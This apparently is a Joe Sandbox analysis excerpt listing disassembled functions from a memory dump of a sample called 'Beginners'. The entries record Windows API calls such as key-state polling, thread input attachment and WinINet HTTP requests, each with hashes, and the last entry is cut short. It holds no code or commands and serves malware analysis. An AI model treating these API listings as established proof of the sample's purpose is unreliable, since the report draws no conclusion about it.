                                          • Instruction Fuzzy Hash: 45416335E00119DFCB01DFA5D8489EDBBB9FF08354F048469EA55A72A1C770AA85CFA0
                                          APIs
                                          • GetKeyboardState.USER32(?), ref: 00110530
                                          • GetAsyncKeyState.USER32(000000A0), ref: 001105B1
                                          • GetKeyState.USER32(000000A0), ref: 001105CC
                                          • GetAsyncKeyState.USER32(000000A1), ref: 001105E6
                                          • GetKeyState.USER32(000000A1), ref: 001105FB
                                          • GetAsyncKeyState.USER32(00000011), ref: 00110613
                                          • GetKeyState.USER32(00000011), ref: 00110625
                                          • GetAsyncKeyState.USER32(00000012), ref: 0011063D
                                          • GetKeyState.USER32(00000012), ref: 0011064F
                                          • GetAsyncKeyState.USER32(0000005B), ref: 00110667
                                          • GetKeyState.USER32(0000005B), ref: 00110679
                                           Memory Dump Source
                                           • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: State$Async$Keyboard
                                          • String ID:
                                          • API String ID: 541375521-0
                                          • Opcode ID: 14457aac3551c13488eb70d6bf8444f71044891b6a10c7745ec10cbcd3a83294
                                          • Instruction ID: b3b10fdcb41018e86916677144c8bdb6daa74826370e5d58a884ff2bed3c330a
                                          • Opcode Fuzzy Hash: 14457aac3551c13488eb70d6bf8444f71044891b6a10c7745ec10cbcd3a83294
                                          • Instruction Fuzzy Hash: CE411974D047C96DFF7B866488143F5BEA1AB5A300F08406ED6C54B5C1EBE499D4CF92
                                          APIs
                                            • Part of subcall function 000B4D37: __itow.LIBCMT ref: 000B4D62
                                            • Part of subcall function 000B4D37: __swprintf.LIBCMT ref: 000B4DAC
                                          • CoInitialize.OLE32 ref: 00128AED
                                          • CoUninitialize.OLE32 ref: 00128AF8
                                          • CoCreateInstance.OLE32(?,00000000,00000017,00143BBC,?), ref: 00128B58
                                          • IIDFromString.OLE32(?,?), ref: 00128BCB
                                          • VariantInit.OLEAUT32(?), ref: 00128C65
                                          • VariantClear.OLEAUT32(?), ref: 00128CC6
                                           Memory Dump Source
                                           • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                          • API String ID: 834269672-1287834457
                                          • Opcode ID: 1719d913dab03ef7983fe551bc4222910176f24937b4c70de6021256de068319
                                          • Instruction ID: ae78237b814db2a89bddf278c4ca017a7a213534d545a29b92c6f6579647a106
                                          • Opcode Fuzzy Hash: 1719d913dab03ef7983fe551bc4222910176f24937b4c70de6021256de068319
                                          • Instruction Fuzzy Hash: 0961B07060A7219FC714DF14E889FAAB7E8EF49714F00085DF9859B291DB70ED94CBA2
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 0011BB13
                                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0011BB89
                                          • GetLastError.KERNEL32 ref: 0011BB93
                                          • SetErrorMode.KERNEL32(00000000,READY), ref: 0011BC00
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Error$Mode$DiskFreeLastSpace
                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                          • API String ID: 4194297153-14809454
                                          • Opcode ID: 4748c39502092008426a306b1b4328402a4c144bc3786a09e29650a0619af291
                                          • Instruction ID: 0095e3a39289d177948d6320cea50951e77a8aaacc50e2d4d906b018c2f40118
                                          • Opcode Fuzzy Hash: 4748c39502092008426a306b1b4328402a4c144bc3786a09e29650a0619af291
                                          • Instruction Fuzzy Hash: 1A31C035A08209AFCB18DF64C8C5EEDB7B8EF49300F108029E905D76D6DB709A81CB55
                                          APIs
                                            • Part of subcall function 000C1A36: _memmove.LIBCMT ref: 000C1A77
                                            • Part of subcall function 0010B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0010B7BD
                                          • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00109BCC
                                          • GetDlgCtrlID.USER32 ref: 00109BD7
                                          • GetParent.USER32 ref: 00109BF3
                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00109BF6
                                          • GetDlgCtrlID.USER32(?), ref: 00109BFF
                                          • GetParent.USER32(?), ref: 00109C1B
                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 00109C1E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 1536045017-1403004172
                                          • Opcode ID: a2fe2165f7e87c4bf09a6985ffc1f31e8c5b0fb653cb0b0c85bcc232f8b7130e
                                          • Instruction ID: 5ddb1e0704ebc8b4d27e459b25806010986432eccad3aba755c02467a8ca7d42
                                          • Opcode Fuzzy Hash: a2fe2165f7e87c4bf09a6985ffc1f31e8c5b0fb653cb0b0c85bcc232f8b7130e
                                          • Instruction Fuzzy Hash: D921F1B5901104AFDF04EB61CC95EFEBBB4EF9A310F000155F9A2932E2DBB489259A20
                                          APIs
                                            • Part of subcall function 000C1A36: _memmove.LIBCMT ref: 000C1A77
                                            • Part of subcall function 0010B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0010B7BD
                                          • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00109CB5
                                          • GetDlgCtrlID.USER32 ref: 00109CC0
                                          • GetParent.USER32 ref: 00109CDC
                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00109CDF
                                          • GetDlgCtrlID.USER32(?), ref: 00109CE8
                                          • GetParent.USER32(?), ref: 00109D04
                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 00109D07
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 1536045017-1403004172
                                          • Opcode ID: 3cd5c7a563530705486b5dfc2f58a3099f057e42163c4fd65d6f6994e2583c99
                                          • Instruction ID: f749797663f58f4050e164fccc5fd5edd8d900fac6bf939814e56e7d35a98781
                                          • Opcode Fuzzy Hash: 3cd5c7a563530705486b5dfc2f58a3099f057e42163c4fd65d6f6994e2583c99
                                          • Instruction Fuzzy Hash: 2121D3B5D41104BBDF05EBA1CC95EFEBBB9EF95300F100015F992931E2DB7589659B20
                                          APIs
                                          • GetParent.USER32 ref: 00109D27
                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 00109D3C
                                          • _wcscmp.LIBCMT ref: 00109D4E
                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00109DC9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ClassMessageNameParentSend_wcscmp
                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                          • API String ID: 1704125052-3381328864
                                          • Opcode ID: 311af0fd7b56d027c643dadf11ebd7f45b7f75e0ddf7abae0cbaf5f5b186a28a
                                          • Instruction ID: 0f627d8150f6a15a80a96536d88f1cba71328930803e1ae7ea5e3a4d483c99e1
                                          • Opcode Fuzzy Hash: 311af0fd7b56d027c643dadf11ebd7f45b7f75e0ddf7abae0cbaf5f5b186a28a
                                          • Instruction Fuzzy Hash: FC1106BA289317BAF6056660EC27DE7739CDF05360B200017FA41A40E3FBE56A615A66
                                          APIs
                                          • VariantInit.OLEAUT32(?), ref: 00128FC1
                                          • CoInitialize.OLE32(00000000), ref: 00128FEE
                                          • CoUninitialize.OLE32 ref: 00128FF8
                                          • GetRunningObjectTable.OLE32(00000000,?), ref: 001290F8
                                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 00129225
                                          • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00143BDC), ref: 00129259
                                          • CoGetObject.OLE32(?,00000000,00143BDC,?), ref: 0012927C
                                          • SetErrorMode.KERNEL32(00000000), ref: 0012928F
                                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0012930F
                                          • VariantClear.OLEAUT32(?), ref: 0012931F
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                          • String ID:
                                          • API String ID: 2395222682-0
                                          • Opcode ID: ca3acc65149295eebf6a0a6bc6009b49949ec48cb880b88c5c3899ceb5629a6f
                                          • Instruction ID: 346cf44d9926caec516ac479239d9f622098119f9ae979601e7b604dc4e9b985
                                          • Opcode Fuzzy Hash: ca3acc65149295eebf6a0a6bc6009b49949ec48cb880b88c5c3899ceb5629a6f
                                          • Instruction Fuzzy Hash: B9C146B1608315AFC700DF69D88496BB7E9FF89308F00495DF98A9B261DB71ED05CB92
                                          APIs
                                          • GetCurrentThreadId.KERNEL32 ref: 001119EF
                                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00110A67,?,00000001), ref: 00111A03
                                          • GetWindowThreadProcessId.USER32(00000000), ref: 00111A0A
                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00110A67,?,00000001), ref: 00111A19
                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00111A2B
                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00110A67,?,00000001), ref: 00111A44
                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00110A67,?,00000001), ref: 00111A56
                                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00110A67,?,00000001), ref: 00111A9B
                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00110A67,?,00000001), ref: 00111AB0
                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00110A67,?,00000001), ref: 00111ABB
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                          • String ID:
                                          • API String ID: 2156557900-0
                                          • Opcode ID: f08ad775ba27f9d07538a73119db02bc4be0fcd3a3f04183f4aeef585e8cd035
                                          • Instruction ID: 3100e4507a3397d79a5f6fd2e1d1305611a1cb7bc0467e982b7d06878d5c937d
                                          • Opcode Fuzzy Hash: f08ad775ba27f9d07538a73119db02bc4be0fcd3a3f04183f4aeef585e8cd035
                                          • Instruction Fuzzy Hash: 1A310E35241244BFEB199F10EC48BA9BBBAFF59305F114525FA09C35A0CBB09DC08B60
                                          APIs
                                          • GetSysColor.USER32(00000008), ref: 000B260D
                                          • SetTextColor.GDI32(?,000000FF), ref: 000B2617
                                          • SetBkMode.GDI32(?,00000001), ref: 000B262C
                                          • GetStockObject.GDI32(00000005), ref: 000B2634
                                          • GetClientRect.USER32(?), ref: 000EC0FC
                                          • SendMessageW.USER32(?,00001328,00000000,?), ref: 000EC113
                                          • GetWindowDC.USER32(?), ref: 000EC11F
                                          • GetPixel.GDI32(00000000,?,?), ref: 000EC12E
                                          • ReleaseDC.USER32(?,00000000), ref: 000EC140
                                          • GetSysColor.USER32(00000005), ref: 000EC15E
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                          • String ID:
                                          • API String ID: 3430376129-0
                                          • Opcode ID: cda9dd9e67d202e6397f13c0a8426ba500bf3c31984690c78a60aefbcb386bde
                                          • Instruction ID: 52f5c40556597450d19349b4cb6df3bf9704372600000bd6ecd60e15e66260cc
                                          • Opcode Fuzzy Hash: cda9dd9e67d202e6397f13c0a8426ba500bf3c31984690c78a60aefbcb386bde
                                          • Instruction Fuzzy Hash: 17117C35500244BFEB625FA5EC08BE97BB1EB0A721F104265FB6A954F1CB324991EF10
                                          APIs
                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 000BADE1
                                          • OleUninitialize.OLE32(?,00000000), ref: 000BAE80
                                          • UnregisterHotKey.USER32(?), ref: 000BAFD7
                                          • DestroyWindow.USER32(?), ref: 000F2F64
                                          • FreeLibrary.KERNEL32(?), ref: 000F2FC9
                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 000F2FF6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                          • String ID: close all
                                          • API String ID: 469580280-3243417748
                                          • Opcode ID: a73203a743ec0036c645400b22ca0e857159d76a1982273bc9d152447bf1583a
                                          • Instruction ID: 94de4673404eb990f94933da7d2f4e6389f6df722417f3c10d2e9bfe8c3bbab2
                                          • Opcode Fuzzy Hash: a73203a743ec0036c645400b22ca0e857159d76a1982273bc9d152447bf1583a
                                          • Instruction Fuzzy Hash: 9AA17A307012128FCB69EF50C4A5BBDF7A4AF05710F5042ADE90AAB662CB31ED56CF91
                                          APIs
                                          • EnumChildWindows.USER32(?,0010B13A), ref: 0010B078
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ChildEnumWindows
                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                          • API String ID: 3555792229-1603158881
                                          • Opcode ID: 626624539c304e5520aa624a0b5bbfae4c92479323f148a063b3a21073b52b18
                                          • Instruction ID: 4ec4a938d52f93c5928e95fa3eee9088f37e23350c6abf116a176feb59cbae4e
                                          • Opcode Fuzzy Hash: 626624539c304e5520aa624a0b5bbfae4c92479323f148a063b3a21073b52b18
                                          • Instruction Fuzzy Hash: B891A870504706DADB18EF60C481BEEFB75FF14300F94811AE99AA72D2DF706959CBA1
                                          APIs
                                          • SetWindowLongW.USER32(?,000000EB), ref: 000B327E
                                            • Part of subcall function 000B218F: GetClientRect.USER32(?,?), ref: 000B21B8
                                            • Part of subcall function 000B218F: GetWindowRect.USER32(?,?), ref: 000B21F9
                                            • Part of subcall function 000B218F: ScreenToClient.USER32(?,?), ref: 000B2221
                                          • GetDC.USER32 ref: 000ED073
                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 000ED086
                                          • SelectObject.GDI32(00000000,00000000), ref: 000ED094
                                          • SelectObject.GDI32(00000000,00000000), ref: 000ED0A9
                                          • ReleaseDC.USER32(?,00000000), ref: 000ED0B1
                                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 000ED13C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                          • String ID: U
                                          • API String ID: 4009187628-3372436214
                                          • Opcode ID: 76a3565eac45a75a2409e05c4f9ce11dfa63cb0659e1e03eb4267354646381f6
                                          • Instruction ID: bee7b10c12d142bf017ce766154ef9a0059ecae482903ecb33fba8adf863b96e
                                          • Opcode Fuzzy Hash: 76a3565eac45a75a2409e05c4f9ce11dfa63cb0659e1e03eb4267354646381f6
                                          • Instruction Fuzzy Hash: 1C71D330504245EFCF61CF65C884AEE7BF5FF49360F2842AAED556A2A6C7318D81DB60
                                          APIs
                                            • Part of subcall function 000B29E2: GetWindowLongW.USER32(?,000000EB), ref: 000B29F3
                                            • Part of subcall function 000B2714: GetCursorPos.USER32(?), ref: 000B2727
                                            • Part of subcall function 000B2714: ScreenToClient.USER32(001777B0,?), ref: 000B2744
                                            • Part of subcall function 000B2714: GetAsyncKeyState.USER32(00000001), ref: 000B2769
                                            • Part of subcall function 000B2714: GetAsyncKeyState.USER32(00000002), ref: 000B2777
                                          • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0013C69C
                                          • ImageList_EndDrag.COMCTL32 ref: 0013C6A2
                                          • ReleaseCapture.USER32 ref: 0013C6A8
                                          • SetWindowTextW.USER32(?,00000000), ref: 0013C752
                                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0013C765
                                          • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0013C847
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                          • API String ID: 1924731296-2107944366
                                          • Opcode ID: d22a2fc44dd18651062f64ce7b124d402cfd88865dd28a037dc9f2cf6ad29cee
                                          • Instruction ID: 8fca6f18875f14e673db45dd555bc80bce3358af2495e074ccc03eedf64b867a
                                          • Opcode Fuzzy Hash: d22a2fc44dd18651062f64ce7b124d402cfd88865dd28a037dc9f2cf6ad29cee
                                          • Instruction Fuzzy Hash: 03518D70108304AFD714EF14CC5AFAA7BF5EB88310F10851DF999972E2CB70A995CB92
                                          APIs
                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0012211C
                                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00122148
                                          • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0012218A
                                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0012219F
                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001221AC
                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 001221DC
                                          • InternetCloseHandle.WININET(00000000), ref: 00122223
                                            • Part of subcall function 00122B4F: GetLastError.KERNEL32(?,?,00121EE3,00000000,00000000,00000001), ref: 00122B64
                                            • Part of subcall function 00122B4F: SetEvent.KERNEL32(?,?,00121EE3,00000000,00000000,00000001), ref: 00122B79
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                          • String ID:
                                          • API String ID: 2603140658-3916222277
                                          • Opcode ID: a3f7e06da839b0e08d1e24d48116d59603c1711a0e336add5b8c0e8cfdb5c3ae
                                          • Instruction ID: 5ed6af1e3ddc3be799fc638edaffa61073cd18a135676b273090a2dc3eec67b0
                                          • Opcode Fuzzy Hash: a3f7e06da839b0e08d1e24d48116d59603c1711a0e336add5b8c0e8cfdb5c3ae
                                          • Instruction Fuzzy Hash: 50419DB5500228BFEB129F60DC89FBF7BACEF09354F004116FA049A151DB759E64CBA1
                                          APIs
                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00140980), ref: 00129412
                                          • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00140980), ref: 00129446
                                          • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 001295C0
                                          • SysFreeString.OLEAUT32(?), ref: 001295EA
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                          • String ID:
                                          • API String ID: 560350794-0
                                          • Opcode ID: 83e2f3390e8ae2d7c7d820885746c38b2f023f949bc86152a25b6c724f455555
